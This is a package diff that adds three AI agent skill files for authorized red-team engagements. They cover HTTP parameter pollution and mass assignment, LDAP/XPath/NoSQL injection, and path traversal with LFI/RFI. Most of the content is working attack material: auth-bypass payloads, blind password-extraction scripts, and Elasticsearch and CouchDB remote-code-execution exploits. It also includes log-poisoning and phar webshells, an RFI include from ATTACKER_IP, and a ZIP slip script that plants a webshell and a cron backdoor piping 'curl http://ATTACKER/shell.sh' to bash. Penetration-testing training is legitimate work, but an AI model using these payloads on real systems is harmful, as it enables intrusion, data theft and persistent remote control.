rtexit-method 0.1.8 → 0.1.9

package/packaged-assets/.agents/skills/rt-http-parameter-pollution/SKILL.md

@@ -0,0 +1,187 @@
+---
+name: rt-http-parameter-pollution
+description: "HTTP Parameter Pollution, mass assignment, and parameter tampering skill for authorized engagements. HPP to bypass WAF/filters, duplicate parameter behavior across frameworks, mass assignment in REST APIs (adding role/admin fields), hidden parameter discovery, parameter type juggling, array injection, and JSON property injection. Use when testing how applications handle unexpected or duplicate parameters."
+---
+
+# rt-http-parameter-pollution — HTTP Parameter Pollution & Mass Assignment
+
+## Overview
+
+Parameter pollution attacks exploit how applications handle unexpected, duplicate, or extra parameters. Different frameworks handle duplicate parameters differently — what the WAF sees vs what the app sees differs, enabling filter bypass and unauthorized data injection.
+
+---
+
+## Phase 1 — HTTP Parameter Pollution (HPP)
+
+```bash
+# Different frameworks handle duplicate params differently:
+# PHP:          last value wins  → ?a=1&a=2 → a=2
+# ASP.NET:      first value wins → ?a=1&a=2 → a=1
+# ASP.NET MVC:  comma-joined     → ?a=1&a=2 → a=1,2
+# Node/Express: array            → ?a=1&a=2 → a=['1','2']
+# Flask/Python: first value      → ?a=1&a=2 → a=1
+
+# WAF bypass: split attack payload across duplicate params
+# WAF sees: a=SEL and a=ECT * → not 'SELECT *' → passes
+# Server concatenates: a=SELECT * → SQLi executes
+curl "https://target.com/search?q=SEL&q=ECT+*+FROM+users"
+curl "https://target.com/search?q=<scr&q=ipt>alert(1)</script>"
+
+# Auth bypass via duplicate params
+# If app checks first param but uses second:
+curl "https://target.com/api?admin=false&admin=true"
+
+# Test HPP behavior
+for val in "1&param=2" "1%26param=2" "1;param=2"; do
+  curl "https://target.com/api?param=$val" -v
+done
+```
+
+---
+
+## Phase 2 — Mass Assignment
+
+```bash
+# REST APIs that bind request body to model objects
+# If model has admin/role field not exposed in docs → inject it
+
+# Registration with role escalation
+curl -X POST https://target.com/api/register \
+  -H "Content-Type: application/json" \
+  -d '{"username":"attacker","password":"pass","role":"admin"}'
+
+# Profile update with hidden fields
+curl -X PUT https://target.com/api/user/profile \
+  -H "Content-Type: application/json" \
+  -d '{"name":"test","isAdmin":true,"verified":true,"credits":99999}'
+
+# Common hidden fields to try
+# role, roles, isAdmin, admin, superuser, verified, active
+# credits, balance, quota, tier, plan
+# permissions, scopes, groups
+# created_at, updated_at (override timestamps)
+# password_confirmation (skip validation)
+
+# Parameter guessing from error messages
+# Send request → error reveals model field names
+curl -X POST https://target.com/api/register \
+  -d '{"invalid_field": "value"}'
+# Error: "Unknown field 'invalid_field'. Known fields: username, password, email, role, isActive"
+# → role and isActive are valid fields!
+
+# GraphQL mass assignment
+# Mutations often accept more fields than documented
+curl -X POST https://target.com/graphql \
+  -d '{"query":"mutation{updateUser(id:1,input:{name:\"x\",role:\"admin\",isAdmin:true}){id name role}}"}'
+```
+
+---
+
+## Phase 3 — Array & JSON Injection
+
+```bash
+# Array injection when server expects single value
+# Normal: ?id=1
+# Array: ?id[]=1&id[]=2 → may access records 1 AND 2
+
+# PHP array injection
+curl "https://target.com/delete?id[]=1&id[]=2&id[]=999"  # Delete multiple records
+curl "https://target.com/api?role[]=user&role[]=admin"   # Multiple roles
+
+# JSON type confusion
+# Server expects string, send array/object
+curl -X POST https://target.com/api/login \
+  -d '{"username":{"$ne":""},"password":{"$ne":""}}'    # MongoDB NoSQL injection
+
+# Type juggling (PHP loose comparison)
+# md5('240610708') == md5('QNKCDZO') → both start with "0e"
+# PHP treats 0e... as scientific notation → both = 0 → equal!
+curl -X POST https://target.com/login \
+  -d "password=240610708"  # If stored hash is md5('QNKCDZO') → login bypass
+
+# JSON number vs string
+curl -X POST https://target.com/api \
+  -d '{"id": "1 OR 1=1"}'     # String — possible SQLi
+curl -X POST https://target.com/api \
+  -d '{"id": 9999999999}'      # Large int — integer overflow
+curl -X POST https://target.com/api \
+  -d '{"id": null}'            # Null — bypass null check
+curl -X POST https://target.com/api \
+  -d '{"id": true}'            # Boolean — type confusion
+```
+
+---
+
+## Phase 4 — Hidden Parameter Discovery
+
+```bash
+# Param Miner (Burp extension) — automated hidden param discovery
+# Active Scan → Param Miner → "Guess params"
+# Tests thousands of potential parameter names
+
+# Manual — common hidden params
+hidden_params=(
+  "debug" "test" "admin" "internal" "dev"
+  "callback" "redirect" "return" "next" "url"
+  "format" "output" "type" "action" "method"
+  "id" "user_id" "account_id" "token" "key"
+  "override" "bypass" "force" "unsafe"
+)
+
+for param in "${hidden_params[@]}"; do
+  response=$(curl -s "https://target.com/api?$param=true" -w "%{http_code}")
+  echo "$param: ${response: -3}"
+done
+
+# Source code mining for hidden params
+# Extract from JavaScript files
+grep -rE "params\[|req\.query\.|request\.args\.|request\.GET\[" *.js *.py *.rb
+linkfinder -i https://target.com -d  # Extract endpoints + params from JS
+```
+
+---
+
+## Phase 5 — Parameter Tampering
+
+```bash
+# Modify parameters that appear fixed/uneditable in UI
+
+# Hidden form fields
+curl -X POST https://target.com/checkout \
+  -d "product_id=1&price=0.01&quantity=1"  # Change price
+
+# JWT claims tampering (see also rt-exploit-jwt)
+# Encoded params in cookies
+# Base64 decode → modify → re-encode
+echo "dXNlcjoxMjM=" | base64 -d  # user:123
+echo -n "user:1" | base64  # → dXNlcjox → change to user 1
+
+# IDOR via parameter change
+GET /api/invoice/download?id=12345  →  id=12344, id=12346
+
+# Price in Base64 (some carts encode price server-side)
+# Decode → modify → encode → submit
+echo "cHJpY2U9MTAwMC4wMA==" | base64 -d  # price=1000.00
+echo -n "price=0.01" | base64 | curl -X POST ... -d "data=BASE64"
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Mass assignment with admin/role fields · HPP with duplicate params · Array injection
+
+**INTERMEDIATE:** WAF bypass via HPP splitting · Hidden parameter discovery with Param Miner · JSON type confusion
+
+**ADVANCED:** PHP type juggling exploit · Complex mass assignment via nested objects · Parameter precedence abuse
+
+**EXPERT:** Framework-specific HPP behavior chains · Custom parameter pollution for specific filter bypass
+
+---
+
+## References
+
+- PortSwigger Mass Assignment: https://portswigger.net/web-security/api-testing/mass-assignment-vulnerabilities  
+- HPP research: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution
+- Param Miner: https://github.com/PortSwigger/param-miner
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/

package/packaged-assets/.agents/skills/rt-ldap-xpath-injection/SKILL.md

@@ -0,0 +1,228 @@
+---
+name: rt-ldap-xpath-injection
+description: "LDAP injection, XPath injection, and deep NoSQL injection skill for authorized engagements. LDAP authentication bypass via filter injection, LDAP enumeration via blind injection, XPath authentication bypass and data extraction, MongoDB operator injection depth, Elasticsearch injection, and CouchDB HTTP API attacks. Use when applications query LDAP directories, XML datastores, or document databases."
+---
+
+# rt-ldap-xpath-injection — LDAP, XPath & Advanced NoSQL Injection
+
+## Overview
+
+Beyond SQL injection, applications use LDAP (directory services), XPath (XML querying), and NoSQL databases — each with their own injection vulnerabilities. LDAP injection can bypass Windows AD authentication. XPath injection can extract entire XML documents. NoSQL injection bypasses authentication across MongoDB, Redis, and Elasticsearch.
+
+---
+
+## Part 1 — LDAP Injection
+
+### Phase 1 — LDAP Auth Bypass
+
+```bash
+# Vulnerable LDAP filter: (&(uid=USER)(password=PASS))
+
+# Auth bypass — close filter early, always true
+Username: *)(uid=*))(|(uid=*
+Password: anything
+# Resulting filter: (&(uid=*)(uid=*))(|(uid=*)(password=anything))
+# Returns first user → logged in as admin
+
+# Simpler bypass
+Username: admin)(&
+Password: anything
+# Filter: (&(uid=admin)(&)(password=anything)) → uid=admin always true
+
+# Wildcard bypass
+Username: *
+Password: *
+# Filter: (&(uid=*)(password=*)) → matches everyone
+
+# Test with curl (LDAP-backed login form)
+curl -X POST https://target.com/login \
+  -d "username=*)(uid=*))(|(uid=*&password=anything"
+# If logged in as first user → LDAP injection confirmed
+```
+
+### Phase 2 — LDAP Blind Enumeration
+
+```bash
+# Extract data via true/false responses
+# (&(uid=admin)(cn=a*)) → if true: admin's CN starts with 'a'
+
+python3 << 'EOF'
+import requests, string
+
+def test_ldap(filter_payload):
+    r = requests.post("https://target.com/login",
+                      data={"username": filter_payload, "password": "x"})
+    return "Login successful" in r.text or r.status_code == 302
+
+# Enumerate admin's email character by character
+email = ""
+for pos in range(1, 50):
+    for char in string.ascii_lowercase + string.digits + "@._-":
+        # Filter: (&(uid=admin)(mail=FOUND_SO_FAR*))
+        payload = f"admin)(mail={email}{char}*)(uid=admin"
+        if test_ldap(payload):
+            email += char
+            print(f"Email so far: {email}")
+            break
+EOF
+```
+
+---
+
+## Part 2 — XPath Injection
+
+### Phase 3 — XPath Auth Bypass
+
+```bash
+# Vulnerable XPath: //users/user[username/text()='USER' and password/text()='PASS']
+
+# Always true bypass
+Username: ' or '1'='1
+Password: ' or '1'='1
+# Query: //users/user[username/text()='' or '1'='1' and ...]  → all users match
+
+# Comment out password check
+Username: admin'  # XPath has no comments, use other techniques
+# Or: admin' or 'x'='x
+
+# Short-circuit
+Username: ' or 1=1 or '
+Password: x
+```
+
+### Phase 4 — XPath Data Extraction (Blind)
+
+```bash
+# Extract XML document contents via true/false responses
+python3 << 'EOF'
+import requests, string
+
+def test_xpath(payload):
+    r = requests.post("https://target.com/search",
+                      data={"username": payload, "password": "x"})
+    return "success" in r.text.lower()
+
+# Count users
+for n in range(1, 20):
+    if test_xpath(f"x' or count(//user)={n} or 'x'='"):
+        print(f"User count: {n}")
+        break
+
+# Extract first user's password character by character
+result = ""
+for pos in range(1, 30):
+    for char in string.printable:
+        payload = f"x' or substring(//user[1]/password,{pos},1)='{char}' or 'x'='"
+        if test_xpath(payload):
+            result += char
+            print(f"Password so far: {result}")
+            break
+EOF
+```
+
+---
+
+## Part 3 — Advanced NoSQL Injection
+
+### Phase 5 — MongoDB Deep Injection
+
+```bash
+# MongoDB operator injection (beyond basic auth bypass)
+
+# $where JavaScript injection
+curl "https://target.com/api/users?filter[$where]=this.username=='admin'&&this.password.match(/a.*/)"
+
+# $regex for enumeration
+curl "https://target.com/api/users?password[$regex]=^a"
+curl "https://target.com/api/users?password[$regex]=^ab"
+# Binary search to extract password
+
+# Blind MongoDB injection via error timing
+for char in a b c d e f 0 1 2 3 4 5 6 7 8 9; do
+  start=$SECONDS
+  curl -s "https://target.com/api?user[$where]=function(){var x=this.password;if(x[0]=='$char'){sleep(2000)};return true}" > /dev/null
+  elapsed=$((SECONDS - start))
+  [ $elapsed -ge 2 ] && echo "First char: $char" && break
+done
+
+# $lookup for cross-collection access (MongoDB aggregation)
+curl "https://target.com/api/search" \
+  -d '{"$lookup":{"from":"users","localField":"_id","foreignField":"_id","as":"user_data"}}'
+
+# Array operator abuse
+curl "https://target.com/api/users?role[$in][]=admin&role[$in][]=superadmin"
+```
+
+### Phase 6 — Elasticsearch Injection
+
+```bash
+# Elasticsearch HTTP API — often unauthenticated internally
+curl http://ES_IP:9200/_cat/indices?v
+curl http://ES_IP:9200/_search?q=*
+
+# Script injection via Painless/Groovy
+curl -X POST "http://ES_IP:9200/users/_search" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "query": {
+      "bool": {
+        "filter": {
+          "script": {
+            "script": {
+              "source": "Runtime rt = Runtime.getRuntime(); String[] commands = new String[]{\"id\"}; Process proc = rt.exec(commands); proc.waitFor(); return true;",
+              "lang": "painless"
+            }
+          }
+        }
+      }
+    }
+  }'
+
+# CVE-2014-3120 / CVE-2015-1427 (Groovy script RCE — older Elasticsearch)
+curl -X POST "http://ES_IP:9200/_search?pretty" \
+  -d '{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"result":{"script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getMethod(\"exec\",java.lang.String.class).invoke(java.lang.Math.class.forName(\"java.lang.Runtime\").getMethod(\"getRuntime\").invoke(null),\"id\")"}}}'
+```
+
+### Phase 7 — CouchDB HTTP API
+
+```bash
+# CouchDB default: no auth, admin party
+curl http://COUCHDB_IP:5984/          # Server info
+curl http://COUCHDB_IP:5984/_all_dbs  # List all databases
+curl http://COUCHDB_IP:5984/users/_all_docs  # All documents
+
+# Create admin account
+curl -X PUT "http://COUCHDB_IP:5984/_config/admins/attacker" \
+  -d '"password123"'
+
+# CVE-2017-12635 (Privilege escalation via JSON parsing)
+curl -X PUT "http://COUCHDB_IP:5984/_users/org.couchdb.user:attacker" \
+  -H "Content-Type: application/json" \
+  -d '{"type":"user","name":"attacker","roles":["_admin"],"roles":[],"password":"password"}'
+
+# Erlang code execution (CVE-2018-8007)
+curl -X PUT "http://admin:pass@COUCHDB_IP:5984/_config/query_servers/cmd" \
+  -d '"os:cmd(\"id\")"'
+curl -X POST "http://admin:pass@COUCHDB_IP:5984/test/_temp_view" \
+  -d '{"map":"cmd(\"id\")"}'
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** LDAP auth bypass with wildcard · XPath always-true bypass · MongoDB $ne auth bypass
+
+**INTERMEDIATE:** Blind LDAP enumeration · XPath character extraction · MongoDB $regex password extraction
+
+**ADVANCED:** Elasticsearch Painless script injection · CouchDB privilege escalation via CVEs
+
+**EXPERT:** Blind time-based LDAP/XPath · MongoDB $where JavaScript injection · Custom NoSQL query analysis
+
+---
+
+## References
+
+- OWASP LDAP Injection: https://owasp.org/www-community/attacks/LDAP_Injection
+- PortSwigger XPath: https://portswigger.net/web-security/xml/xpath-injection
+- MongoDB injection: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection

package/packaged-assets/.agents/skills/rt-path-traversal/SKILL.md

@@ -0,0 +1,172 @@
+---
+name: rt-path-traversal
+description: "Path traversal, Local File Inclusion (LFI), and Remote File Inclusion (RFI) skill for authorized engagements. Directory traversal to /etc/passwd, LFI via PHP wrappers, LFI to RCE via log poisoning and /proc/self/environ, ZIP slip file upload attacks, null byte injection, encoding bypasses, and RFI for remote code execution. Use when applications load files based on user input."
+---
+
+# rt-path-traversal — Path Traversal, LFI & RFI
+
+## Overview
+
+Path traversal and file inclusion vulnerabilities let attackers read arbitrary files (LFI) or include remote malicious code (RFI) by manipulating file path parameters. LFI escalates to RCE via log poisoning, PHP wrappers, or /proc pseudo-filesystem abuse.
+
+---
+
+## Phase 1 — Path Traversal Detection
+
+```bash
+# Basic traversal
+https://target.com/download?file=../../../etc/passwd
+https://target.com/view?page=../../../../etc/shadow
+https://target.com/load?template=../../config.php
+
+# Encoding bypasses
+../             → %2e%2e%2f
+../             → ..%2f
+../             → %2e%2e/
+../             → ....//          (double dot slash)
+../             → ..%252f         (double URL encode)
+../             → ..%c0%af        (overlong UTF-8)
+
+# Null byte (bypass file extension check in old PHP)
+?file=../../../../etc/passwd%00.png
+# PHP < 5.3: %00 truncates string → .png ignored
+
+# Automated with ffuf
+ffuf -u "https://target.com/file?name=FUZZ" \
+  -w /opt/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt \
+  -mr "root:x\|\\[boot loader\\]"
+```
+
+---
+
+## Phase 2 — LFI Sensitive File Targets
+
+```bash
+# Linux
+/etc/passwd           # User accounts
+/etc/shadow           # Password hashes (root only)
+/etc/hosts            # Internal hostnames
+/etc/crontab          # Scheduled tasks
+/proc/self/environ    # Environment variables (may have DB passwords)
+/proc/self/cmdline    # Current process command line
+/proc/self/fd/        # Open file descriptors
+/var/log/apache2/access.log   # Apache access log (for log poisoning)
+/var/log/nginx/access.log     # Nginx access log
+/var/log/auth.log             # SSH auth logs
+/var/mail/www-data            # Mail spool
+/home/user/.ssh/id_rsa        # SSH private key
+/home/user/.bash_history      # Command history
+/var/www/html/.env            # Laravel/Symfony secrets
+/var/www/html/config.php      # App database credentials
+
+# Windows
+C:\Windows\win.ini
+C:\Windows\System32\drivers\etc\hosts
+C:\inetpub\wwwroot\web.config
+C:\xampp\apache\logs\access.log
+C:\wamp\logs\access.log
+C:\Users\Administrator\Desktop\
+```
+
+---
+
+## Phase 3 — LFI to RCE
+
+```bash
+# Method 1: Apache/Nginx Log Poisoning
+# Step 1: Inject PHP into User-Agent (written to access.log)
+curl "https://target.com/" -A "<?php system(\$_GET['cmd']); ?>"
+
+# Step 2: Include the log file
+https://target.com/page?file=/var/log/apache2/access.log&cmd=id
+# PHP executes the shell code in the log
+
+# Method 2: /proc/self/environ
+# Set PHP in User-Agent
+curl "https://target.com/" -A "<?php system(\$_GET['c']); ?>"
+# Include environ
+https://target.com/page?file=/proc/self/environ&c=id
+
+# Method 3: SSH Log Poisoning
+# SSH as: ssh '<?php system($_GET["cmd"]); ?>'@target.com
+# Include: /var/log/auth.log
+
+# Method 4: PHP Wrappers
+# php://filter — read PHP source
+https://target.com/page?file=php://filter/convert.base64-encode/resource=config.php
+
+# php://input — execute POST body as PHP (requires allow_url_include)
+curl "https://target.com/page?file=php://input" -d "<?php system('id'); ?>"
+
+# data:// wrapper — include inline PHP
+https://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
+# base64 of: <?php system('id'); ?>
+
+# phar:// — PHP archive code execution
+# Create phar with PHP payload
+php -r "
+\$p = new Phar('shell.phar');
+\$p['shell.php'] = '<?php system(\$_GET[\"c\"]); ?>';
+\$p->stopBuffering();
+"
+# Upload phar as image (phar magic bytes don't look like PHP)
+# Include: ?file=phar://uploads/shell.phar/shell.php&c=id
+```
+
+---
+
+## Phase 4 — RFI (Remote File Inclusion)
+
+```bash
+# Requires: allow_url_include = On in PHP (less common now)
+# Host malicious PHP
+echo '<?php system($_GET["c"]); ?>' > shell.txt
+python3 -m http.server 8080
+
+# Include remote file
+https://target.com/page?file=http://ATTACKER_IP:8080/shell.txt&c=id
+
+# SMB-based RFI (Windows targets)
+# Host share: smbserver.py -smb2support share /tmp/
+https://target.com/page?file=\\ATTACKER_IP\share\shell.php&c=whoami
+```
+
+---
+
+## Phase 5 — ZIP Slip / Archive Path Traversal
+
+```python
+# Malicious ZIP with path traversal in filename
+import zipfile
+
+with zipfile.ZipFile("zipslip.zip", "w") as z:
+    # Traverse to webroot
+    z.writestr("../../var/www/html/shell.php",
+               "<?php system($_GET['c']); ?>")
+    z.writestr("../../etc/cron.d/backdoor",
+               "* * * * * root curl http://ATTACKER/shell.sh | bash")
+
+# Upload → server extracts → shell.php written to webroot
+curl https://target.com/upload -F "archive=@zipslip.zip"
+curl https://target.com/shell.php?c=id
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** Basic ../ traversal for /etc/passwd · PHP filter wrapper for source read
+
+**INTERMEDIATE:** Log poisoning for LFI→RCE · php://input execution · ZIP Slip
+
+**ADVANCED:** phar:// deserialization · /proc/ exploitation · Encoding bypass chains
+
+**EXPERT:** Blind LFI detection via timing · Custom encoding chains · LFI in binary protocols
+
+---
+
+## References
+
+- PortSwigger Path Traversal: https://portswigger.net/web-security/file-path-traversal
+- PayloadsAllTheThings LFI: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
+- LFI to RCE techniques: https://www.hackingarticles.in/comprehensive-guide-to-local-file-inclusion/